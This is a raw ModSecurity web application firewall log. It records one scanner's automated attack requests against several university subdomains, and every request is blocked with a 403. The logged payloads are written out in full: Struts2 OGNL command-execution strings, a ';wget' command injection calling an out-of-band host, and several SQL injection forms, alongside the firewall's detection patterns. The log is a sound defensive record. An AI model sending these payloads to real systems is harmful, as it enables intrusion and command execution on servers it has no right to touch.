[Tue Aug 29 11:33:58.280934 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "www.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11NsCo-f0AAASK4cMAAAAI"]
[Tue Aug 29 11:33:58.456295 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:plot. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:plot: ;wget http:/cjmn8l5jmimk2adbbnlgwykxs598ct6fq.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NsCo-f0AAARy-4gAAAAb"]
[Tue Aug 29 11:33:58.942553 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id_products[]: 1 AND (SELECT 3875 FROM (SELECT(SLEEP(6)))xoOt)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NsCo-f0AAASK4coAAAAI"]
[Tue Aug 29 11:33:59.100109 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');  found within ARGS:options: [\\x22test'); INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES (16, 16,'2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO extra_field_options(option_value) VALUES ('2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO tag (id, tag, field_id,count) VALUES(16, '2UdxkpHWJwFq0iCfNXfFeNNF0Wt', 16,0) ON DUPLICATE KEY UPDATE     tag='2UdxkpHWJwFq0iCfNXfFeNNF0Wt', field_id=16, count=0;  -- \\x..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11N8Co-f0AAARy-48AAAAb"]
[Tue Aug 29 11:33:59.119964 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');  found within ARGS:options: [\\x22test'); INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES (16, 16,'2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO extra_field_options(option_value) VALUES ('2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO tag (id, tag, field_id,count) VALUES(16, '2UdxkpHWJwFq0iCfNXfFeNNF0Wt', 16,0) ON DUPLICATE KEY UPDATE     tag='2UdxkpHWJwFq0iCfNXfFeNNF0Wt', field_id=16, count=0;  -- \\x..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11N8Co-f0AAARy-5AAAAAb"]
[Tue Aug 29 11:33:59.121221 2023] [:error] [pid 1167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');  found within ARGS:options: [\\x22test'); INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES (16, 16,'2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO extra_field_options(option_value) VALUES ('2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO tag (id, tag, field_id,count) VALUES(16, '2UdxkpHWJwFq0iCfNXfFeNNF0Wt', 16,0) ON DUPLICATE KEY UPDATE     tag='2UdxkpHWJwFq0iCfNXfFeNNF0Wt', field_id=16, count=0;  -- \\x..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11N8Co-f0AAASPDJQAAAAS"]
[Tue Aug 29 11:33:59.124923 2023] [:error] [pid 1168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');  found within ARGS:options: [\\x22test'); INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES (16, 16,'2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO extra_field_options(option_value) VALUES ('2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO tag (id, tag, field_id,count) VALUES(16, '2UdxkpHWJwFq0iCfNXfFeNNF0Wt', 16,0) ON DUPLICATE KEY UPDATE     tag='2UdxkpHWJwFq0iCfNXfFeNNF0Wt', field_id=16, count=0;  -- \\x..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11N8Co-f0AAASQp-AAAAAT"]
[Tue Aug 29 11:33:59.134420 2023] [:error] [pid 1172] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');  found within ARGS:options: [\\x22test'); INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES (16, 16,'2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO extra_field_options(option_value) VALUES ('2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO tag (id, tag, field_id,count) VALUES(16, '2UdxkpHWJwFq0iCfNXfFeNNF0Wt', 16,0) ON DUPLICATE KEY UPDATE     tag='2UdxkpHWJwFq0iCfNXfFeNNF0Wt', field_id=16, count=0;  -- \\x..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11N8Co-f0AAASUXykAAAAd"]
[Tue Aug 29 11:33:59.307006 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "www.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11N8Co-f0AAASOUoYAAAAR"]
[Tue Aug 29 11:33:59.328843 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- \\x22] found within ARGS:options: [\\x22test') or 1=1 -- \\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11N8Co-f0AAASS774AAAAY"]
[Tue Aug 29 11:33:59.349109 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- \\x22] found within ARGS:options: [\\x22test') or 1=1 -- \\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11N8Co-f0AAASS778AAAAY"]
[Tue Aug 29 11:33:59.359039 2023] [:error] [pid 1171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- \\x22] found within ARGS:options: [\\x22test') or 1=1 -- \\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11N8Co-f0AAAST4-EAAAAZ"]
[Tue Aug 29 11:33:59.364914 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- \\x22] found within ARGS:options: [\\x22test') or 1=1 -- \\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11N8Co-f0AAASK4dUAAAAI"]
[Tue Aug 29 11:33:59.368147 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- \\x22] found within ARGS:options: [\\x22test') or 1=1 -- \\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11N8Co-f0AAASOUokAAAAR"]
[Tue Aug 29 11:33:59.376323 2023] [:error] [pid 1163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccess [hostname "www.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11N8Co-f0AAASLqBEAAAAM"]
[Tue Aug 29 11:33:59.392678 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');  found within ARGS:options: [\\x22test'); INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES (16, 16,'2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO extra_field_options(option_value) VALUES ('2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO tag (id, tag, field_id,count) VALUES(16, '2UdxkpHWJwFq0iCfNXfFeNNF0Wt', 16,0) ON DUPLICATE KEY UPDATE     tag='2UdxkpHWJwFq0iCfNXfFeNNF0Wt', field_id=16, count=0;  -- \\x..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11N8Co-f0AAASS78EAAAAY"]
[Tue Aug 29 11:34:00.338677 2023] [:error] [pid 1168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- \\x22] found within ARGS:options: [\\x22test') or 1=1 -- \\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11OMCo-f0AAASQp-IAAAAT"]
[Tue Aug 29 11:34:00.340202 2023] [:error] [pid 1164] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "www.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11OMCo-f0AAASMgdwAAAAO"]
[Tue Aug 29 11:34:00.353158 2023] [:error] [pid 1167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:CityId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')), found within ARGS:CityId: 33'union select sys.fn_sqlvarbasetostr(HashBytes('MD5','2UdxjgrcjQwqw1tZm6TSev79zjh')),2--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/user/City_ajax.aspx"] [unique_id "ZO11OMCo-f0AAASPDJYAAAAS"]
[Tue Aug 29 11:34:00.402063 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:CityId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')), found within ARGS:CityId: 33'union select sys.fn_sqlvarbasetostr(HashBytes('MD5','2UdxjgrcjQwqw1tZm6TSev79zjh')),2--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/user/City_ajax.aspx"] [unique_id "ZO11OMCo-f0AAASK4dgAAAAI"]
[Tue Aug 29 11:34:00.402263 2023] [:error] [pid 1167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:CityId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')), found within ARGS:CityId: 33'union select sys.fn_sqlvarbasetostr(HashBytes('MD5','2UdxjgrcjQwqw1tZm6TSev79zjh')),2--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/user/City_ajax.aspx"] [unique_id "ZO11OMCo-f0AAASPDJgAAAAS"]
[Tue Aug 29 11:34:00.405437 2023] [:error] [pid 1165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:CityId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')), found within ARGS:CityId: 33'union select sys.fn_sqlvarbasetostr(HashBytes('MD5','2UdxjgrcjQwqw1tZm6TSev79zjh')),2--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/user/City_ajax.aspx"] [unique_id "ZO11OMCo-f0AAASNzoEAAAAQ"]
[Tue Aug 29 11:34:00.406620 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:CityId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')), found within ARGS:CityId: 33'union select sys.fn_sqlvarbasetostr(HashBytes('MD5','2UdxjgrcjQwqw1tZm6TSev79zjh')),2--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/user/City_ajax.aspx"] [unique_id "ZO11OMCo-f0AAARy-5YAAAAb"]
[Tue Aug 29 11:34:01.456047 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:S1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:S1: (SELECT md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/yyoa/common/js/menu/test.jsp"] [unique_id "ZO11OcCo-f0AAASIz-wAAAAG"]
[Tue Aug 29 11:34:01.457385 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:S1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:S1: (SELECT md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/yyoa/common/js/menu/test.jsp"] [unique_id "ZO11OcCo-f0AAAQKOroAAAAs"]
[Tue Aug 29 11:34:01.476974 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:S1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:S1: (SELECT md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/yyoa/common/js/menu/test.jsp"] [unique_id "ZO11OcCo-f0AAASIz-0AAAAG"]
[Tue Aug 29 11:34:01.479381 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:S1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:S1: (SELECT md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/yyoa/common/js/menu/test.jsp"] [unique_id "ZO11OcCo-f0AAAQKOrsAAAAs"]
[Tue Aug 29 11:34:01.537210 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "www.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11OcCo-f0AAASAHfkAAAAH"]
